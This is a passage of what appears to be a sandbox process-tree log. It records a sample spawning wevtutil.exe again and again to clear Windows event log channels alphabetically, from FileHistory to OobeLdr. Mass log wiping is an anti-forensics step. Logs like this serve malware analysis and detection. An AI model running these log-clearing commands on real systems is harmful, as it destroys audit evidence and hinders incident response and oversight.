PID:496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Analytic"
3⤵
PID:400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Debug"
3⤵
PID:988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Analytic"
3⤵
PID:644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Debug"
3⤵
PID:3988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/WHC"
3⤵
PID:2512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Analytic"
3⤵
PID:3412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/BackupLog"
3⤵
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Debug"
3⤵
PID:3188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Analytic"
3⤵
PID:4016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Debug"
3⤵
PID:3844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Analytic"
3⤵
PID:3528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Debug"
3⤵
PID:488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Analytic"
3⤵
PID:2932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Debug"
3⤵
PID:3336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
3⤵
PID:1776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
3⤵
PID:2288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
3⤵
PID:3860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FontGroups/Diagnostic"
3⤵
PID:3932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
3⤵
PID:1736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
3⤵
PID:3900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GPIO-ClassExtension/Analytic"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GenericRoaming/Admin"
3⤵
PID:2800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
3⤵
PID:152

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
3⤵
PID:2268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
3⤵
PID:3064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
3⤵
PID:808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HelloForBusiness/Operational"
3⤵
PID:3892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Help/Operational"
3⤵
PID:3096

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
3⤵
PID:992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
3⤵
PID:3052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
3⤵
PID:2064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
3⤵
PID:1036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
3⤵
PID:2156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
3⤵
PID:800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Analytic"
3⤵
PID:2284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Operational"
3⤵
PID:2124

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Log"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
3⤵
PID:3796

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"
3⤵
PID:612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"
3⤵
PID:2940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"
3⤵
PID:2180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"
3⤵
PID:2084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"
3⤵
PID:3764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"
3⤵
PID:200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
3⤵
PID:2200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
3⤵
PID:360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-Broker/Analytic"
3⤵
PID:272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-CandidateUI/Analytic"
3⤵
PID:276

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"
3⤵
PID:3048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"
3⤵
PID:4020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPAPI/Analytic"
3⤵
PID:3260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPLMP/Analytic"
3⤵
PID:2212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPPRED/Analytic"
3⤵
PID:280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPSetting/Analytic"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPTIP/Analytic"
3⤵
PID:2224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-KRAPI/Analytic"
3⤵
PID:3964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-KRTIP/Analytic"
3⤵
PID:848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-OEDCompiler/Analytic"
3⤵
PID:2812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-TCCORE/Analytic"
3⤵
PID:4012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-TCTIP/Analytic"
3⤵
PID:2264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-TIP/Analytic"
3⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPNAT/Diagnostic"
3⤵
PID:852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
3⤵
PID:4008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IdCtrls/Analytic"
3⤵
PID:736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IdCtrls/Operational"
3⤵
PID:2160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"
3⤵
PID:1776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Input-HIDCLASS-Analytic"
3⤵
PID:180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-InputSwitch/Diagnostic"
3⤵
PID:1876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
3⤵
PID:2300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International/Operational"
3⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
3⤵
PID:3900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
3⤵
PID:256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
3⤵
PID:3720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-KdsSvc/Operational"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kerberos/Operational"
3⤵
PID:312

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
3⤵
PID:1340

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/General"
3⤵
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/Performance"
3⤵
PID:988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Analytic"
3⤵
PID:3628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Debug"
3⤵
PID:504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Operational"
3⤵
PID:2824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
3⤵
PID:3412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Operational"
3⤵
PID:1176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
3⤵
PID:876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
3⤵
PID:416

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
3⤵
PID:3844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
3⤵
PID:1984

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
3⤵
PID:3360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-IO/Operational"
3⤵
PID:2448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"
3⤵
PID:2232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-IoTrace/Diagnostic"
3⤵
PID:3876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Analytic"
3⤵
PID:2272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
3⤵
PID:3860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
3⤵
PID:3932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Pdc/Diagnostic"
3⤵
PID:284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Pep/Diagnostic"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"
3⤵
PID:2128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration"
3⤵
PID:360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"
3⤵
PID:272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"
3⤵
PID:276

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"
3⤵
PID:3048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
3⤵
PID:3064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
3⤵
PID:3260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
3⤵
PID:2212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
3⤵
PID:280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
3⤵
PID:2224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
3⤵
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Performance"
3⤵
PID:3700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Debug"
3⤵
PID:2364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"
3⤵
PID:900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Operational"
3⤵
PID:2924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
3⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
3⤵
PID:1892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
3⤵
PID:2816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
3⤵
PID:1420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
3⤵
PID:4000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
3⤵
PID:264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-XDV/Analytic"
3⤵
PID:1876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
3⤵
PID:1736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
3⤵
PID:2488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
3⤵
PID:2800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LSA/Diagnostic"
3⤵
PID:1220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LSA/Operational"
3⤵
PID:3720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LSA/Performance"
3⤵
PID:1704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
3⤵
PID:2912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
3⤵
PID:808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
3⤵
PID:988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguageProfile/Analytic"
3⤵
PID:3452

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LimitsManagement/Diagnostic"
3⤵
PID:504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"
3⤵
PID:3052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"
3⤵
PID:1036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LiveId/Analytic"
3⤵
PID:2812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LiveId/Operational"
3⤵
PID:4012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"
3⤵
PID:2264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
3⤵
PID:2284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
3⤵
PID:4008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSFTEDIT/Diagnostic"
3⤵
PID:736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
3⤵
PID:2160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
3⤵
PID:3876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
3⤵
PID:180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
3⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
3⤵
PID:2300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
3⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
3⤵
PID:1380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMC"
3⤵
PID:252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMR"
3⤵
PID:152

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Media-Streaming/MDE"
3⤵
PID:496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"
3⤵
PID:4020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
3⤵
PID:3692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
3⤵
PID:644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
3⤵
PID:3988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-Performance/SARStreamResource"
3⤵
PID:3096

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
3⤵
PID:888

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
3⤵
PID:3964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Minstore/Analytic"
3⤵
PID:848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Minstore/Debug"
3⤵
PID:4016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api-Internal/Analytic"
3⤵
PID:876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api/Analytic"
3⤵
PID:2364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Analytic"
3⤵
PID:1820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational"
3⤵
PID:2924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-SmsApi/Analytic"
3⤵
PID:3360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-SmsRouter/Admin"
3⤵
PID:3796

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-SmsRouter/Analytic"
3⤵
PID:2816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
3⤵
PID:260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mprddm/Operational"
3⤵
PID:2180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
3⤵
PID:3860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
3⤵
PID:3764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
3⤵
PID:200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
3⤵
PID:1736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
3⤵
PID:2128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
3⤵
PID:2268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NFC-Class-Extension/Analytical"
3⤵
PID:272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
3⤵
PID:276

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
3⤵
PID:1704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
3⤵
PID:3064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ncasvc/Operational"
3⤵
PID:2912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Diagnostic"
3⤵
PID:808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Operational"
3⤵
PID:280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NdisImPlatform/Operational"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ndu/Diagnostic"
3⤵
PID:504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
3⤵
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-Connection-Broker"
3⤵
PID:3412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-DataUsage/Analytic"
3⤵
PID:2812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-Setup/Diagnostic"
3⤵
PID:4012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
3⤵
PID:3844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkBridge/Diagnostic"
3⤵
PID:2124

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
3⤵
PID:2932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
3⤵
PID:4036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
3⤵
PID:736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProvider/Operational"
3⤵
PID:2940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Analytic"
3⤵
PID:3876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Operational"
3⤵
PID:2084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkSecurity/Debug"
3⤵
PID:3932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkStatus/Analytic"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
3⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Networking-RealTimeCommunication/Tracing"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
3⤵
PID:252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
3⤵
PID:3028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ntfs/Operational"
3⤵
PID:312

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ntfs/Performance"
3⤵
PID:2796

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ntfs/WHC"
3⤵
PID:3260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NvdimmN/Analytic"
3⤵
PID:3692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NvdimmN/Diagnostic"
3⤵
PID:1364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NvdimmN/Operational"
3⤵
PID:3096

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLE/Clipboard-Performance"
3⤵
PID:3192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
3⤵
PID:2916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
3⤵
PID:3656

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-FirstLogonAnim/Diagnostic"
3⤵
PID:2156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-Core/Diagnostic"
3⤵
PID:3896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-DUI/Diagnostic"
3⤵
PID:3528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-DUI/Operational"
3⤵
PID:1820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-Plugins-Wireless/Diagnostic"
3⤵
PID:852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
3⤵
PID:3336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
3⤵
PID:2448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
3⤵
PID:2288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
3⤵
PID:260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OneBackup/Debug"
3⤵
PID:4000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
3⤵
PID:2188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OneX/Operational"
3⤵
PID:2804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
3⤵
PID:3900

C:\Windows\system32\wevtutil.exe
